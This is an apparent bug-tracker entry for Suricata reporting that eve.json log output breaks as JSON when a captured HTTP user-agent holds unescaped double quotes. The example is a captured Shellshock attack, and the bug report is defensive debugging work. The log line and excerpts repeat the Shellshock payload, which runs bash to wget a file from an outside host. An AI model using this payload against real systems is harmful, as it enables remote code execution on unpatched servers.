Actions
Bug #1299
closedeve.json JSON output not valid under certain circumstances (e.g. Shellshock)
Status:
Closed
Priority:
Normal
Assignee:
-
Target version:
-
Affected Versions:
Effort:
Difficulty:
Label:
Description
This example comes from recent shellshock attacks.
grep '()' /sdcard/suricata/var/log/suricata/eve.json | sed 's/***\.***\./XXX\.XXX\./g' | while read line; do echo $line | python -m json.tool >> /tmp/test.json || echo $line >> /tmp/invalid.json; done
...
tail -n1 /tmp/invalid.json
...
tail -n1 /tmp/invalid.json
{"timestamp":"2014-10-06T19:08:31.121661","event_type":"fileinfo","src_ip":"XXX.XXX.0.94","src_port":80,"dest_ip":"46.165.221.166","dest_port":28220,"proto":"TCP","http":{"url":"/","hostname":"oneiroi.co.uk","http_refer":"<unknown>","http_user_agent":"() { :;}; /bin/bash -c "wget http://psicologoweb.net/mc/s.php/oneiroi.co.uk""},"fileinfo":{"filename":"/","magic":"unknown","state":"CLOSED","stored":false,"size":178}}
The issue here is the http_user_agent; as the UA was sent with an exploit payload:
bin/bash -c "wget http://psicologoweb.net/mc/s.php/oneiroi.co.uk"
Ths again gets wrapped in double quotes when passing it out to eve.json such that the JSON is now invalid:
"bin/bash -c "wget http://psicologoweb.net/mc/s.php/oneiroi.co.uk""
...
tail -n1 /tmp/invalid.json | sed 's/-c "/-c \\"/g' | sed 's/""/\\""/g' | python -m json.tool
{
"dest_ip": "46.165.221.166",
"dest_port": 28220,
"event_type": "fileinfo",
"fileinfo": {
"filename": "/",
"magic": "unknown",
"size": 178,
"state": "CLOSED",
"stored": false
},
"http": {
"hostname": "oneiroi.co.uk",
"http_refer": "<unknown>",
"http_user_agent": "() { :;}; /bin/bash -c \"wget http://psicologoweb.net/mc/s.php/oneiroi.co.uk\"",
"url": "/"
},
"proto": "TCP",
"src_ip": "XXX.XXX.0.94",
"src_port": 80,
"timestamp": "2014-10-06T19:08:31.121661"
}
TL;DR: escaping of " char is required before writing out into eve.json; otherwise it is possible to create invalid JSON
Actions